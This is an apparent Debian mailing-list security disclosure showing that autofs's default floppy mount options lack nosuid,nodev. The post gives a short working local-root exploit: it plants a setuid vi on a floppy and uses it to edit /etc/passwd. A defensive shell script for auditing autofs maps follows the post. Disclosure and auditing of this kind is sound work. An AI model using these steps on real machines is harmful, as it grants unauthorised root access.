I'm obviously doing something wrong ... I've written to the maintainer of the autofs package according to the page summary listed under 'packages' from the website, and as I also saw somewhere else (dpkg -s listing?). I filed a bug report against autofs and marked it as release critical. I have heard nothing for the past two (three?) days and need to make this known:
There is a severe security problem for all Debian machines running any version of autofs and having a floppy drive available as /dev/fd0. The options listed in /etc/auto.misc fail to include the options "nosuid,nodev" and as such anyone with a floppy disk and physical access to a floppy drive may become root on that machine. Here is the 'sploit:

    # superformat /dev/fd0u1440
    # mke2fs /dev/fd0
    # cp /usr/bin/vi /var/autofs/floppy
    # chmod u+s /var/autofs/floppy/vi
    # umount /var/autofs/floppy
    [sneakernet to victim]
    % /var/autofs/floppy/vi /etc/passwd
    :wq!
    % telnet localhost
    [...]

Well, you get the idea. All user-modifiable filesystems must be mounted nosuid,nodev or the systems that trust them can be trivially compromised. Besides floppy, this also includes the 'removable' /dev/hdd, and possibly the CD-ROM as well.

regards,
Christopher
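As an added illustration of the fix the post calls for (this is not part of Christopher's message or of the autofs package): a small POSIX sh audit that reads an autofs map in the /etc/auto.misc format and reports every entry whose mount options lack nosuid or nodev. The map contents below are a constructed sample; the entry names and devices are assumptions for the example.

```shell
#!/bin/sh
# Audit an autofs map (auto.misc format: key [-options] location) for
# entries that are mounted without nosuid and nodev.
set -f   # no globbing while we word-split map lines

# Constructed sample map; the "floppy" and "data" entries are the weak ones.
SAMPLE_MAP="$(mktemp)"
cat > "$SAMPLE_MAP" <<'EOF'
# constructed sample of /etc/auto.misc
cd        -fstype=iso9660,ro,nosuid,nodev  :/dev/cdrom
floppy    -fstype=auto,sync                :/dev/fd0
removable -fstype=auto,sync,nosuid,nodev   :/dev/hdd
data      :/dev/hda1
EOF

# check_automap MAPFILE
# Prints "<key>: missing <options>" for each weak entry.
# Returns 1 if any entry is weak, 0 if every entry carries nosuid,nodev.
check_automap() {
    _map="$1"
    _bad=0
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac   # skip blanks and comments
        set -- $line
        key="$1"; opts="$2"
        # The options field is optional; if the second field does not start
        # with "-" it is the location and the entry has no options at all.
        case "$opts" in -*) ;; *) opts="" ;; esac
        missing=""
        case ",$opts," in *,nosuid,*) ;; *) missing="$missing nosuid" ;; esac
        case ",$opts," in *,nodev,*)  ;; *) missing="$missing nodev"  ;; esac
        if [ -n "$missing" ]; then
            printf '%s: missing%s\n' "$key" "$missing"
            _bad=1
        fi
    done < "$_map"
    return $_bad
}

if check_automap "$SAMPLE_MAP"; then
    echo "all entries carry nosuid,nodev"
fi
```

Run it against the real map with `check_automap /etc/auto.misc`; a non-zero exit is the signal that an entry still needs "nosuid,nodev" added to its options.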